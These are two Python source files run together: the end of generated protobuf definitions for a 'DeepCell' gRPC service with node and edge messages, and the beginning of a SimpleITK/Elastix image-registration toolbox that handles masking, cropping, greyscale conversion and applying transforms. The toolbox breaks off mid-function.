is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='neurons', full_name='Node.neurons', index=3,
number=4, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='coordinate', full_name='Node.coordinate', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='growth', full_name='Node.growth', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature1', full_name='Node.feature1', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature2', full_name='Node.feature2', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature3', full_name='Node.feature3', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=160,
serialized_end=325,
)
_COORDINATE = _descriptor.Descriptor(
name='Coordinate',
full_name='Coordinate',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='Coordinate.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='y', full_name='Coordinate.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=327,
serialized_end=361,
)
_EDGE = _descriptor.Descriptor(
name='Edge',
full_name='Edge',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='Edge.source', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='target', full_name='Edge.target', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='importance', full_name='Edge.importance', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='Edge.type', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature1', full_name='Edge.feature1', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature2', full_name='Edge.feature2', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature3', full_name='Edge.feature3', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=363,
serialized_end=489,
)
_REPLY.fields_by_name['nodes'].message_type = _NODE
_REPLY.fields_by_name['edges'].message_type = _EDGE
_NODE.fields_by_name['coordinate'].message_type = _COORDINATE
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Reply'] = _REPLY
DESCRIPTOR.message_types_by_name['Node'] = _NODE
DESCRIPTOR.message_types_by_name['Coordinate'] = _COORDINATE
DESCRIPTOR.message_types_by_name['Edge'] = _EDGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Request)
))
_sym_db.RegisterMessage(Request)
Reply = _reflection.GeneratedProtocolMessageType('Reply', (_message.Message,), dict(
DESCRIPTOR = _REPLY,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Reply)
))
_sym_db.RegisterMessage(Reply)
Node = _reflection.GeneratedProtocolMessageType('Node', (_message.Message,), dict(
DESCRIPTOR = _NODE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Node)
))
_sym_db.RegisterMessage(Node)
Coordinate = _reflection.GeneratedProtocolMessageType('Coordinate', (_message.Message,), dict(
DESCRIPTOR = _COORDINATE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Coordinate)
))
_sym_db.RegisterMessage(Coordinate)
Edge = _reflection.GeneratedProtocolMessageType('Edge', (_message.Message,), dict(
DESCRIPTOR = _EDGE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Edge)
))
_sym_db.RegisterMessage(Edge)
_DEEPCELL = _descriptor.ServiceDescriptor(
name='DeepCell',
full_name='DeepCell',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=491,
serialized_end=528,
methods=[
_descriptor.MethodDescriptor(
name='Run',
full_name='DeepCell.Run',
index=0,
containing_service=None,
input_type=_REQUEST,
output_type=_REPLY,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_DEEPCELL)
DESCRIPTOR.services_by_name['DeepCell'] = _DEEPCELL
# @@protoc_insertion_point(module_scope)
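# Usage sketch (illustrative values, not part of the generated file): the
# messages above can be constructed directly, e.g. before calling the
# DeepCell.Run RPC through a gRPC stub generated for this proto.
#
#   req = Request(genes=['TP53', 'BRCA1'], ontology='GO', growth=True,
#                 npaths=3, request1=0.5)
#   reply = Reply(nodes=[Node(id='n1', gi=0.1)], edges=[])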
|
# -*- coding: utf-8 -*-
"""
@author: pattenh1
"""
import numpy as np
import cv2
import os
import SimpleITK as sitk
#import pandas as pd
import time
import datetime
import xml.etree.ElementTree as ET
import xml.dom.minidom
import pkg_resources
class RegImage(object):
'''
Container class for image meta data and processing between ITK and cv2
'''
def __init__(self, filepath, im_format, img_res=1, load_image=True):
'''
Container class for image meta data and processing between ITK and cv2
:param filepath: filepath to the image
:type filepath: str
:param im_format: 'sitk' - SimpleITK format or 'np' - numpy (cv2)
:type im_format: str
:param img_res: pixel spacing of the image
:type img_res: float
'''
self.type = 'Registration Image Container'
self.filepath = filepath
self.im_format = im_format
self.spacing = float(img_res)
if load_image == True:
try:
image = sitk.ReadImage(self.filepath)
self.image_xy_dim = image.GetSize()[0:2]
except:
print('Error: image type not recognized')
return
self.image = self.set_img_type(image, self.im_format)
def get_image_from_memory(self, image):
if isinstance(image, sitk.Image):
self.image = image
self.image_xy_dim = self.image.GetSize()[0:2]
self.image = self.set_img_type(self.image, 'sitk')
else:
print('use SimpleITK images to load from memory')
def set_img_type(self, image, im_format):
"""Short summary.
Parameters
----------
image : numpy array or SimpleITK.Image()
Loaded image for registration
im_format : str
'sitk' or 'np' for SimpleITK or Numpy as type.
Returns
-------
self.image or self.mask
image or mask for registration in desired format in memory
"""
if im_format == 'np':
image = sitk.GetArrayFromImage(image)
return image
if im_format == 'sitk':
if len(image.GetSpacing()) == 3:
image.SetSpacing((self.spacing, self.spacing, float(1)))
else:
image.SetSpacing((self.spacing, self.spacing))
return image
def load_mask(self, filepath, im_format):
"""
Loads binary mask for registration.
Parameters
----------
filepath : str
filepath to 8-bit mask with one ROI
im_format : str
'sitk' or 'np' for SimpleITK or Numpy as type.
Returns
-------
self.mask
mask for registration in desired format in memory
"""
self.mask_filepath = filepath
self.mask_im_format = im_format
try:
image = sitk.ReadImage(self.mask_filepath)
self.mask_xy_dim = image.GetSize()[0:2]
self.mask = self.set_img_type(image, self.mask_im_format)
except:
print('Error: image type not recognized')
def get_mask_bounding_box(self):
"""Calculates bounding box of the mask and returns a python dictionary
with the minimum x and y point as well as box width and height for
later slicing.
Returns
-------
dict
returns mask bounding box as dict
"""
try:
self.mask
if self.mask_xy_dim == self.image_xy_dim:
x, y, w, h = self.calculate_bounding_box()
self.mask_bounding_box = {}
self.mask_bounding_box.update({
'min_x': x,
'min_y': y,
'bb_width': w,
'bb_height': h,
})
else:
print('Error: Mask and image dimensions do not match')
except AttributeError:
print('Error: no mask has been loaded')
def crop_to_bounding_box(self):
try:
self.mask_bounding_box
self.image = self.image[
self.mask_bounding_box['min_x']:self.mask_bounding_box['min_x']
+ self.mask_bounding_box['bb_width'], self.mask_bounding_box[
'min_y']:self.mask_bounding_box['min_y'] +
self.mask_bounding_box['bb_height']]
self.mask = self.mask[
self.mask_bounding_box['min_x']:self.mask_bounding_box['min_x']
+ self.mask_bounding_box['bb_width'], self.mask_bounding_box[
'min_y']:self.mask_bounding_box['min_y'] +
self.mask_bounding_box['bb_height']]
self.image.SetOrigin((0, 0))
self.mask.SetOrigin((0, 0))
self.type = self.type + '-Bounding Box Cropped'
except AttributeError:
print('Error: no bounding box extents found')
def calculate_bounding_box(self):
'''
Uses sitk to get the bounding box, assumes the image is a uint8 mask with only 1 polygonal label.
Returns top-left x,y pixel coordinates and the width and height of bounding box.
'''
#in case the image is np array
if isinstance(self.mask, sitk.Image) == False:
mask = sitk.GetImageFromArray(self.mask)
else:
mask = self.mask
cc = sitk.ConnectedComponent(mask)
lab_stats = sitk.LabelStatisticsImageFilter()
lab_stats.Execute(cc, cc)
bb = lab_stats.GetBoundingBox(1)
x, y, w, h = bb[0], bb[2], bb[1] - bb[0], bb[3] - bb[2]
print('bounding box:', x, y, w, h)
return x, y, w, h
def to_greyscale(self):
'''
Converts RGB registration image to greyscale using cv2. (sitk images will eventually be converted using ITK...)
'''
if self.im_format == 'sitk':
if self.image.GetNumberOfComponentsPerPixel() == 3:
spacing = self.image.GetSpacing()
image = sitk.GetArrayFromImage(self.image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = sitk.GetImageFromArray(image)
image.SetSpacing(spacing)
elif self.image.GetNumberOfComponentsPerPixel() > 1:
raise ValueError('Channel depth != 3, image is not RGB type')
elif self.image.GetNumberOfComponentsPerPixel() == 1:
image = self.image
if self.im_format == 'np':
if self.image.shape == 3 and self.image.shape[2] == 3:
image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
else:
raise ValueError('Channel depth != 3, image is not RGB type')
self.image = image
self.type = self.type + '-Greyscaled'
def compress_AF_channels(self, compression):
'''
This converts multi-layer 2D images, such as multichannel fluorescence images, to a single layer by summing or taking the mean or max across layers.
The final image will be rescaled to unsigned 8-bit.
:param compression: 'sum', 'mean', or 'max'.
'''
if self.im_format == 'sitk':
if self.image.GetDepth() > 1:
image = sitk.GetArrayFromImage(self.image)
if compression == 'sum':
image = np.sum(image, 0)
#print(image.dtype)
#image = cast_8bit_np(image)
if compression == 'mean':
image = np.mean(image, 0)
#print(image.dtype)
if compression == 'max':
image = np.max(image, 0)
#print(image.dtype)
#image = cast_8bit_np(image)
self.image = sitk.GetImageFromArray(image)
self.image = sitk.RescaleIntensity(self.image, 0, 255)
self.image = sitk.Cast(self.image, sitk.sitkUInt8)
#self.image.SetSpacing(self.spacing)
self.image.SetSpacing((self.spacing, self.spacing))
self.type = self.type + '-AF channels compressed'
else:
raise ValueError('Only one layer, image is not multichannel')
if self.im_format == 'np':
if len(self.image.shape) == 3 and self.image.shape[0] > 1:
image = self.image
if compression == 'sum':
image = image.sum(axis=0)
if compression == 'mean':
image = image.mean(axis=0)
if compression == 'max':
image = image.max(axis=0)
#image = cast_8bit_np(image)
self.image = image
self.type = self.type + '-AF channels compressed'
else:
raise ValueError('Only one layer, image is not multichannel')
def invert_intensity(self):
'''
This will invert the intensity scale of a greyscale registration image.
This is useful with histological images where the background is 'whitish.'
'''
if self.im_format == 'sitk':
#use sitk filters instead of CV2 conversion
image = sitk.InvertIntensity(self.image)
#img_bu = self.image
#image = sitk.GetArrayFromImage(self.image)
#image = cv2.bitwise_not(image)
#image = sitk.GetImageFromArray(image)
# image.CopyInformation(img_bu)
if self.im_format == 'np':
image = cv2.bitwise_not(self.image)
self.image = image
self.type = self.type + '-image intensity inverted'
def flip_type(self):
'''
This is a convenience function that flips an image between cv2 and SimpleITK formats.
'''
if self.im_format == 'sitk':
self.image = sitk.GetArrayFromImage(self.image)
self.im_format = 'np'
else:
self.image = sitk.GetImageFromArray(self.image)
self.im_format = 'sitk'
self.image.SetSpacing((self.spacing, self.spacing))
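# Usage sketch (file paths and resolution are illustrative): load an image and
# its mask, crop both to the mask's bounding box, and convert to greyscale
# before registration.
#
#   reg_im = RegImage('histology.tif', 'sitk', img_res=0.5)
#   reg_im.load_mask('histology_mask.tif', 'sitk')
#   reg_im.get_mask_bounding_box()
#   reg_im.crop_to_bounding_box()
#   reg_im.to_greyscale()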
class parameter_files(object):
'''
Class to load SimpleITK parameters from file
'''
def __init__(self):
resource_package = 'regToolboxMSRC'
self.testing = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'testing.txt'))))
self.rigid = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'rigid.txt'))))
self.scaled_rigid = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'scaled_rigid.txt'))))
self.affine = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'affine.txt'))))
self.nl = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'nl.txt'))))
self.correction = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'fi_correction.txt'))))
self.affine_test = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'affine_test.txt'))))
def get_mask_bb(mask_fp):
'''
Uses sitk to get the bounding box after reading the image from file, assumes the image is a uint8 mask.
Returns top-left x,y pixel coordinates and the width and height of bounding box.
:param mask_fp: File path to the mask image
'''
mask = sitk.ReadImage(mask_fp)
mask = sitk.ConnectedComponent(mask)
lab_stats = sitk.LabelStatisticsImageFilter()
lab_stats.Execute(mask, mask)
bb = lab_stats.GetBoundingBox(1)
x, y, w, h = bb[0], bb[2], bb[1] - bb[0], bb[3] - bb[2]
print('bounding box:', x, y, w, h)
return x, y, w, h
def register_elx_(source,
target,
param,
source_mask=None,
target_mask=None,
output_dir="transformations",
output_fn="myreg.txt",
return_image=False,
logging=True):
'''
Utility function to register 2D images and save their results in a user named subfolder and transformation text file.
:param source: SimpleITK image used as the source (moving) image. Can optionally pass sitk.ReadImage(source_img_fp) to load the image from file. Note that this function is usually used together with the 'RegImage' class, where image spacing is set
:param target: SimpleITK image used as the target (fixed) image. Can optionally pass sitk.ReadImage(target_img_fp) to load the image from file. Note that this function is usually used together with the 'RegImage' class, where image spacing is set
:param param: Elastix parameter file loaded into SWIG. Can optionally pass sitk.ReadParameterFile(parameter_fp) to load a text parameter file. See http://elastix.isi.uu.nl/ for example parameter files
:param source_mask:
Filepath to the source mask image (a binary mask) or the SimpleITK source mask image itself.
Function will type check the image.
:param target_mask:
Filepath to the target mask image (a binary mask) or the SimpleITK target mask image itself.
Function will type check the image.
:param output_dir:
String used to create a folder in the current working directory to store registration outputs (iteration information and transformation parameter file)
:param output_fn:
String used to name transformation file in the output_fn directory
:param logging:
Boolean, whether SimpleElastix should log to console. Note that this logging doesn't work in IPython notebooks
:param bounding_box:
Currently experimental option that addresses masking in SimpleElastix by cropping images to the bounding box of their mask
:return: Transformation file and optionally the registered source image
:return type: SimpleITK parameter map and SimpleITK image
'''
try:
selx = sitk.SimpleElastix()
except:
selx = sitk.ElastixImageFilter()
if logging == True:
selx.LogToConsoleOn()
param_selx = param
#turns off returning the image in the parameter file
if return_image == False:
param_selx['WriteResultImage'] = ('false', )
selx.SetParameterMap(param_selx)
#set masks if used
if source_mask == None:
pass
else:
if isinstance(source_mask, sitk.Image) == True:
selx.SetMovingMask(source_mask)
else:
source_mask = sitk.ReadImage(source_mask)
source_mask.SetSpacing(source.GetSpacing())
selx.SetMovingMask(source_mask)
if target_mask == None:
pass
else:
if isinstance(target_mask, sitk.Image) == True:
selx.SetFixedMask(target_mask)
else:
target_mask = sitk.ReadImage(target_mask)
target_mask.SetSpacing(target.GetSpacing())
selx.SetFixedMask(target_mask)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
selx.SetOutputDirectory(os.path.join(os.getcwd(), output_dir))
selx.SetMovingImage(source)
selx.SetFixedImage(target)
selx.LogToFileOn()
#execute registration:
if return_image == True:
transformed_image = selx.Execute()
else:
selx.Execute()
os.rename(
os.path.join(os.getcwd(), output_dir, 'TransformParameters.0.txt'),
os.path.join(os.getcwd(), output_dir, output_fn))
transformationMap = selx.GetTransformParameterMap()
if return_image == True:
return transformationMap, transformed_image
else:
return transformationMap
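# Usage sketch (file names are illustrative): register a source to a target
# with one of the bundled rigid parameter files and keep the registered image.
#
#   source = RegImage('source.tif', 'sitk', img_res=1.0)
#   target = RegImage('target.tif', 'sitk', img_res=1.0)
#   tmap, registered = register_elx_(source.image, target.image,
#                                    parameter_files().rigid,
#                                    output_dir='transformations',
#                                    output_fn='rigid_tform.txt',
#                                    return_image=True)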
def register_elx_n(source,
target,
param,
output_dir="transformations",
output_fn="myreg.txt",
return_image=False,
intermediate_transform=False,
logging=True):
'''
Utility function to register 2D images and save their results in a user named subfolder and transformation text file.
:param source: RegImage object used as the source (moving) image; its image and, when present, its mask and bounding box are used.
:param target: RegImage object used as the target (fixed) image; its image and, when present, its mask and bounding box are used.
:param param: Elastix parameter file loaded into SWIG. Can optionally pass sitk.ReadParameterFile(parameter_fp) to load a text parameter file. See http://elastix.isi.uu.nl/ for example parameter files
Masks, when present, are taken from the `mask` attribute of the source and target RegImage objects rather than passed as parameters.
:param output_dir:
String used to create a folder in the current working directory to store registration outputs (iteration information and transformation parameter file)
:param output_fn:
String used to name transformation file in the output_fn directory
:param logging:
Boolean, whether SimpleElastix should log to console. Note that this logging doesn't work in IPython notebooks
:param bounding_box:
Currently experimental option that addresses masking in SimpleElastix by cropping images to the bounding box of their mask
:return: Transformation file and optionally the registered source image
:return type: SimpleITK parameter map and SimpleITK image
'''
try:
selx = sitk.SimpleElastix()
except:
selx = sitk.ElastixImageFilter()
#check that both inputs are RegImage instances
if not isinstance(source, RegImage):
print('Error: source is not an object of type RegImage')
return
if not isinstance(target, RegImage):
print('Error: target is not an object of type RegImage')
return
if logging == True:
selx.LogToConsoleOn()
param_selx = param
#turns off returning the image in the parameter file
if return_image == False:
param_selx['WriteResultImage'] = ('false', )
selx.SetParameterMap(param_selx)
#set masks if used
try:
source.mask
if isinstance(source.mask, sitk.Image) == True:
selx.SetMovingMask(source.mask)
else:
print('Error: Source mask could not be set')
except AttributeError:
print('No moving mask found')
try:
target.mask
if isinstance(target.mask, sitk.Image) == True:
selx.SetFixedMask(target.mask)
else:
print('Error: Target mask could not be set')
except AttributeError:
print('No fixed mask found')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
selx.SetOutputDirectory(os.path.join(os.getcwd(), output_dir))
selx.SetMovingImage(source.image)
selx.SetFixedImage(target.image)
selx.LogToFileOn()
#execute registration:
if return_image == True:
transformed_image = selx.Execute()
else:
selx.Execute()
#os.rename(
# os.path.join(os.getcwd(), output_dir, 'TransformParameters.0.txt'),
# os.path.join(os.getcwd(), output_dir, output_fn + '.txt'))
transformationMap = selx.GetTransformParameterMap()[0]
transformationMap['OriginalSizeMoving'] = [
str(source.image_xy_dim[0]),
str(source.image_xy_dim[1])
]
transformationMap['OriginalSizeFixed'] = [
str(target.image_xy_dim[0]),
str(target.image_xy_dim[1])
]
transformationMap['BoundingBoxMoving'] = ['0', '0', '0', '0']
transformationMap['BoundingBoxFixed'] = ['0', '0', '0', '0']
if hasattr(source, 'mask_bounding_box'):
transformationMap['BoundingBoxMoving'] = [
str(source.mask_bounding_box['min_x']),
str(source.mask_bounding_box['min_y']),
str(source.mask_bounding_box['bb_width']),
str(source.mask_bounding_box['bb_height'])
]
if hasattr(target, 'mask_bounding_box'):
transformationMap['BoundingBoxFixed'] = [
str(target.mask_bounding_box['min_x']),
str(target.mask_bounding_box['min_y']),
str(target.mask_bounding_box['bb_width']),
str(target.mask_bounding_box['bb_height'])
]
if intermediate_transform == True:
transformationMap['IntermediateTransform'] = ['true']
else:
transformationMap['IntermediateTransform'] = ['false']
sitk.WriteParameterFile(transformationMap,
os.path.join(os.getcwd(), output_dir,
output_fn + '.txt'))
if return_image == True:
return transformationMap, transformed_image
else:
return transformationMap
def paste_to_original_dim(transformed_image, target_x, target_y,
final_size_2D):
'''
Experimental support function that uses 'crops' of singular masks rather than Elastix masking (which seems not to work...).
Returns the image in the original coordinate space.
:param target_x:
top-left x coordinate of mask's bounding box
:param target_y:
top-left y coordinate of mask's bounding box
:param final_size_2D:
m x n dimensions of target image from registration
'''
if transformed_image.GetNumberOfComponentsPerPixel() == 3:
print('RGB_image')
placeholder = sitk.Image([final_size_2D[0], final_size_2D[1]],
transformed_image.GetPixelIDValue(), 3)
placeholder.GetSize()
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y])
elif transformed_image.GetDepth() > 1:
print('multichannel_image')
placeholder = sitk.Image(
[final_size_2D[0], final_size_2D[1],
transformed_image.GetDepth()],
transformed_image.GetPixelIDValue())
#print('image made')
#print(str(placeholder.GetSize()))
#print(str(transformed_image.GetSize()))
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y, 0])
elif transformed_image.GetDepth(
) < 1 and transformed_image.GetNumberOfComponentsPerPixel() == 1:
print('singlechannel_image')
placeholder = sitk.Image([final_size_2D[0], final_size_2D[1]],
transformed_image.GetPixelIDValue())
placeholder.GetSize()
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y])
return transformed_image
def check_im_size_fiji(image):
'''
Checks to see if image size is too large to be loaded into FIJI as a .tiff
:param image:
SimpleITK image
'''
impixels = image.GetSize()[0] * image.GetSize()[1]
if len(image.GetSize()) > 2:
impixels = impixels * image.GetSize()[2]
impixels = impixels * image.GetNumberOfComponentsPerPixel()
return impixels > 10**9
def transform_image(source, transformationMap, override_tform=False):
"""Transforms an image using SimpleTransformix.
Parameters
----------
source : SimpleITK.Image
SimpleITK image that will be registered.
transformationMap : SimpleITK parameterMap
SimpleITK parameterMap that defines transformation
Returns
-------
SimpleITK image
Transformed image
"""
try:
transformix = sitk.SimpleTransformix()
except:
transformix = sitk.TransformixImageFilter()
overriden_flag = False
if 'BoundingBoxMoving' in transformationMap:
bb_source = list(transformationMap['BoundingBoxMoving'])
bb_source = [int(float(x)) for x in bb_source]
if sum(bb_source) > 0:
source = source[bb_source[0]:bb_source[0] + bb_source[2],
bb_source[1]:bb_source[1] + bb_source[3]]
source.SetOrigin([0, 0])
transformix.SetMovingImage(source)
transformix.SetTransformParameterMap(transformationMap)
transformix.LogToConsoleOn()
source_tformed = transformix.Execute()
if source_tformed.GetSize(
) != transformationMap['OriginalSizeFixed'] and override_tform == True:
bb = list(transformationMap['BoundingBoxFixed'])
bb = [int(float(x)) for x in bb]
img_size = list(transformationMap['OriginalSizeFixed'])
img_size = [int(float(x)) for x in img_size]
source_tformed = paste_to_original_dim(source_tformed, bb[0], bb[1],
(img_size[0], img_size[1]))
overriden_flag = True
if source_tformed.GetSize(
) != transformationMap['OriginalSizeFixed'] and transformationMap['IntermediateTransform'] == (
'false', ) and overriden_flag == False:
bb_target = list(transformationMap['BoundingBoxFixed'])
bb_target = [int(float(x)) for x in bb_target]
img_size = list(transformationMap['OriginalSizeFixed'])
img_size = [int(float(x)) for x in img_size]
source_tformed = paste_to_original_dim(source_tformed, bb_target[0],
bb_target[1],
(img_size[0], img_size[1]))
img_spacing = [float(x) for x in transformationMap['Spacing']]
source_tformed.SetSpacing(img_spacing)
return (source_tformed)
def transform_mc_image_sitk(image_fp,
transformationMap,
img_res,
from_file=True,
is_binary_mask=False,
override_tform=False):
if from_file == True:
print('image loaded from file')
image = sitk.ReadImage(image_fp)
if len(image.GetSpacing()) == 3:
image.SetSpacing((float(img_res), float(img_res), float(1)))
else:
image.SetSpacing((float(img_res), float(img_res)))
if from_file == False:
print('image loaded from memory')
image = image_fp
# grayscale image transformation
if image.GetNumberOfComponentsPerPixel() == 1 and image.GetDepth() == 0:
print('transforming grayscale image')
tformed_image = transform_image(
image, transformationMap, override_tform=override_tform)
print('casting grayscale image')
if is_binary_mask == True:
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
else:
tformed_image = sitk.RescaleIntensity(tformed_image, 0, 255)
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
# RGB image
if image.GetNumberOfComponentsPerPixel() > 1:
tformed_image = []
for chan in range(image.GetNumberOfComponentsPerPixel()):
print('getting image ' + str(chan) + ' of RGB')
channel = sitk.VectorIndexSelectionCast(image, chan)
print('transforming image ' + str(chan) + ' of RGB')
channel = transform_image(
channel, transformationMap, override_tform=override_tform)
print('rescaling image ' + str(chan) + ' of RGB')
channel = sitk.RescaleIntensity(channel, 0, 255)
tformed_image.append(channel)
print('composing RGB')
tformed_image = sitk.Compose(tformed_image)
tformed_image = sitk.Cast(tformed_image, sitk.sitkVectorUInt8)
return tformed_image
#multilayer 2D image, i.e. multichannel fluorescence
if image.GetDepth() > 0:
tformed_image = []
for chan in range(image.GetDepth()):
print('getting image ' + str(chan) + ' of multi-layer image')
channel = image[:, :, chan]
print('transforming image ' + str(chan) + ' of multi-layer image')
channel = transform_image(
channel, transformationMap, override_tform=override_tform)
print('rescaling image ' + str(chan) + ' of multi-layer image')
channel = sitk.RescaleIntensity(channel, 0, 255)
tformed_image.append(channel)
print('adding images to sequence')
tformed_image = sitk.JoinSeries(tformed_image)
print('casting to 8-bit')
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
return tformed_image
def transform_from_gui(source_fp, transforms, TFM_wd, src_reso, project_name):
"""Deprecated function for gui transform. This will read a python list of
transforms and apply them in chain.
Parameters
----------
source_fp : str
Filepath string to image to be transformed
transforms : list
Python list of transform filepaths
TFM_wd : str
String of directory where image will be saved
src_reso : float
pixel resolution of image
project_name : str
Name that will be appended onto saved image.
Returns
-------
None
Only writes image
"""
for i in range(len(transforms)):
if i == 0:
source = transform_mc_image_sitk(
source_fp,
transforms[i],
src_reso,
from_file=True,
is_binary_mask=False)
if i > 0:
source = transform_mc_image_sitk(
source,
transforms[i],
source.GetSpacing()[0],
from_file=False,
is_binary_mask=False)
os.chdir(TFM_wd)
sitk.WriteImage(source, project_name + ".tif", True)
def write_param_xml(xml_params, opdir, ts, project_name):
"""Deprecated xml parameter save function. changed to .yaml
"""
stringed = ET.tostring(xml_params)
reparsed = xml.dom.minidom.parseString(stringed)
myfile = open(opdir + ts + project_name + '_parameters.xml', "w")
myfile.write(reparsed.toprettyxml(indent="\t"))
myfile.close()
return
def prepare_output(wd, project_name, xml_params):
"""Deprecaed xml parameter function.
"""
#prepare folder name
ts = datetime.datetime.fromtimestamp(
time.time()).strftime('%Y%m%d_%H_%M_%S_')
os.chdir(wd)
os.makedirs(ts + project_name + "_images")
opdir = ts + project_name + "_images\\"
    #output parameters to XML file
write_param_xml(xml_params, opdir, ts, project_name)
def RegImage_load(image, source_img_res, load_image=True):
if isinstance(image, sitk.Image) == True:
image.SetSpacing((source_img_res, source_img_res))
return image
elif os.path.exists(image):
try:
image = RegImage(image, 'sitk', source_img_res, load_image)
return image
except:
print('invalid image file')
def parameterFile_load(parameterFile):
"""Convenience function to load parameter file. Detects whether parameterFile
is already loaded into memory or needs to be loaded from file.
Parameters
----------
parameterFile : str or SimpleITK parameterMap
filepath to a SimpleITK parameterMap or a SimpleITK parameterMap loaded into memory
Returns
-------
SimpleITK parameterMap
"""
if isinstance(parameterFile, sitk.ParameterMap) == True:
return parameterFile
elif os.path.exists(parameterFile):
try:
parameterFile = sitk.ReadParameterFile(parameterFile)
return parameterFile
except:
print('invalid parameter file')
else:
print('parameter input is not valid')
def reg_image_preprocess(image_fp,
img_res,
